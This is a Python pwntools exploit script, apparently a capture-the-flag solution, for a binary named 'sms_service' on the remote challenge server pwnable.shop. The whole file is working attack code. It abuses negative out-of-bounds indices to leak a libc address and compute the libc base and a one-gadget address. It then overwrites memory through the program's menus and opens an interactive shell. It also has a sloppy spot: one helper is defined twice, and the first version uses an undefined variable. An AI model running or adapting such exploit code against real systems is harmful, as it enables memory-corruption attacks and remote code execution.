꿀잼 문제
from pwn import *
#s = process("./sms_service",env={'LD_PRELOAD':'./libc'})
s = remote("pwnable.shop",10001)
elf = ELF("./sms_service")
libc = ELF("./libc")
def soldier(name,index):
s.recvuntil(">> ")
s.sendline("1")
s.recvuntil(">> ")
s.sendline("1")
s.recvuntil(">> ")
s.send(name)
s.recvuntil(">> ")
s.sendline(str(index))
def citizen_set():
s.recvuntil(">> ")
s.sendline('2')
s.recvuntil(">> ")
s.send(cti_name)
s.recvuntil(">> ")
def citizen_set(cti_name):
s.recvuntil(">> ")
s.sendline('2')
s.recvuntil(">> ")
s.sendline(cti_name)
def main():
s.recvuntil(">> ")
s.sendline("3")
soldier("\x00",-263011)
s.recvuntil("Msg : ")
leak = u64(s.recv(6)+"\x00\x00")
print "leak : " + hex(leak)
libc_base = leak - libc.symbols['puts']
system = libc_base + libc.symbols['system']
one_shot = libc_base + 0xf02a4
print "libc_base : " + hex(libc_base)
print "system : " + hex(system)
print "one_shot : " + hex(one_shot)
main()
#-19
citizen_set(p64(0x10539))
main()
soldier("A"*64,-19)
main()
soldier("\x00"*64,-19)
main()
soldier("JIWON",-263011)
main()
citizen_set("JIWON")
s.recvuntil(">> ")
s.sendline("1")
s.recvuntil(">> ")
s.sendline(p64(one_shot))
s.interactive()